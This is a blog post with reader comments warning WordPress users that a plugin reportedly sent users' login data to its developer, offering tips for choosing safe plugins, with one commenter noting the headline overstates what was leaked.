Now, how would you react knowing that the plugin that you had used for ages emailed your admin login credentials to the plugin developer and you didn’t even know ?
Scary – isn’t it ? Well, that’s just what happened to this blogger Sven.
Sven reports in his post that while experimenting with a few plugins he found that a plugin (Pushit) plugin actually emailed his admin id and password to an email.
Now, this could have been an oversight or a mistake but its a serously scary thought.
What can you do to make sure that your WordPress plugins are “safe” ?
Quite honestly, I don’t know of anything that will give us a 100% security but there are certain things you can do for sure.
1. Install and run plugins only from developers who have a good reputation.
2. Always test the plugin on a demo/test blog.
3. Look for plugin reviews on the plugin page(usually developers blog) comments, or elsewhere on the web.
4. Never install plugins not tested with your version of blog software.
WordPress plugins are great resources and probably one of the USPs for us liking the software as millions do. But blindly trusting all of them could also land us in trouble, just a word of caution to all.
|
SEO Auditor Features - Complete SEO audit - Competitor Analysis - Report generation Try it today ! |
Link Assistant Features - Easy Link Building - Finds link partners - Get backlinks regularly Try it today ! |
Rank Tracker Features - Rank Check reports - 558 Search Engines - Keyword Research Try it today ! |
Possibly related SEO & Social Media Articles
- The best Wordpress Plugin developers of 2008
Here is a nice list I found the other day. W-Shadow has put up a top 10 list of the best Wordpress plugin developers of 2008, based on plugin popularity and number of plugins developed. I think it’s a very apt and true list. Check out the plugins from these authors, they’re all cool. Michael Torbert [...]... - Wordpress plugin to replace post titles with fancy fonts
Dinu, a fellow blogger from Cochin is pretty impressed with Amy Mahon’s wordpress theme over here, and was wondering what’s that funky text doing at the post titles ? Watch closely and you’ll find that the post titles are replaced with cool text effects rather than the plain text. Right click on the title and you’ll [...]... - Add a Twitter button on your posts – Wordpress plugin, “Tweet this”
Now, that you and your friends are tweeting more these days, it’s not alarming to see someone come up with the plugin. And that someone is – Richard X Thripp, and the plugin in a simple wordpress one, that adds a cute twitter bird image on top right corner of all of your posts, which [...]... - A Wordpress plugin that help fight scrapers and copycats
Scrapers/ Sploggers and copy cats are the names you’d never want to hear these days. Simply because every blog has a splogger who’s scraping your content from the RSS feeds everyday.There are lot of tools available to fight scrapers, and here’s a brand new plugin for Wordpress that’ll help you to fight scrapers. It’s the categories Autolink [...]... - A wordpress plugin that will help you make money from your blog
Wordpress plugins are made keeping in mind the utility and functional aspects of your blog. Sometimes, they turn out to help you make money from your blog as well. Here is a great plugin which was meant for something else but ultimately will help you make money online. This wordpress plugin is actually made for making [...]...
SEO Blog Sponsors
|
Hi, I'm Mani Karthik, SEO, Blogging & Social Media Enthusiast. I primarily blog about SEO and Social Media on this blog, basically How-to articles and tutorials to help the SEO learner. Feel free to have a look around and drop comments. Hope you enjoy your stay.
>> More about me |
© 2009 DailySEOblog.com Privacy policy
Thank you very much for sharing such a valuable information. Really this post create awareness for all word press developers.
Reply
Is it impossible to see the code of Wordpress plugins then?
Reply
Tech @ InkAPoint
Replied:
Yes. You can. Just open the plugin’s zip file and see the php files.
Reply
I have to disagree with #4 completely.
I’ve installed WordPress 2.8 (not on my main site, I admit) and since a lot of plugin creators seem to have ignored the release of 2.8, I’ve had to test myself whether the plugins will work.
DailySEOBlog seems to have ignored #4 itself.
I can’t say positively but I’m pretty sure that the “Notify me of follow-up comments via e-mail” is the Subscribe to Comments plugin. If you look at the Subscribe to Comments page (wordpress.org/extend/plugins/subscribe-to-comments) you will notice that is listed as officially only “Compatible up to: 2.3.1″ That hasn’t stopped the thousands of people who download it weekly.
Reply
Mani Karthik
Replied:
I completely agree Yael. In fact, I hadn’t taken it seriously to this time. If the plugin works fine even after an upgrade, then I’d keep it. But I think this is a mistake I’ve been making and am seriously considering pulling them off with minimum user exp problems.
Reply
Tech @ InkAPoint
Replied:
You are right Mani. Sometimes plugins will work like upward compatible versions. But what’s the problem is not all plugins are working as 100% compatible to newer versions of WP.
We can’t say that plugins will not work if it is developed for earlier versions of wp.
Reply
I would have thought that Wordpress’s approval process would be a little more careful about the kind of code placed in these plugins but I guess not.
Reply
Thanks mani for the advise.
Reply
I think one should always use a plugin which is there on wordpress directory.
DOn’t use plugins from the the authors site.
What do you think?
Reply
@Nihar: until Sven’s post, that particular plugin was in the WordPress directory.
However, I think the title of this post is (unintentionally) misleading. If you read Sven’s post again, you’ll see that the plugin did not do anything with the WordPress admin password, only some basic SMS request data (that included the username and password for the SMS service, but nothing as sensitive as the WordPress admin password).
Don’t get me wrong; it’s still a security issue. After all, the plugin was doing something without the user’s permission.
But I’m pretty sure that your admin password is actually very safe, even from malicious plugin authors, because it is not stored clear text (even in the database). There’s no way that I know of for a plugin to ever access the unencrypted version of the password.
All that said, it is definitely best to be cautious with any plugins. I think your tips are good ones. Perhaps some enterprising security pro will start a plugin-review blog and do us all a favor.
Reply
Malicious WordPress plugin steals your admin password, and you didn’t even know? http://tinyurl.com/machfl
Reply
its best but also its naughty tool
Reply
great one,and well doen.keep up
Reply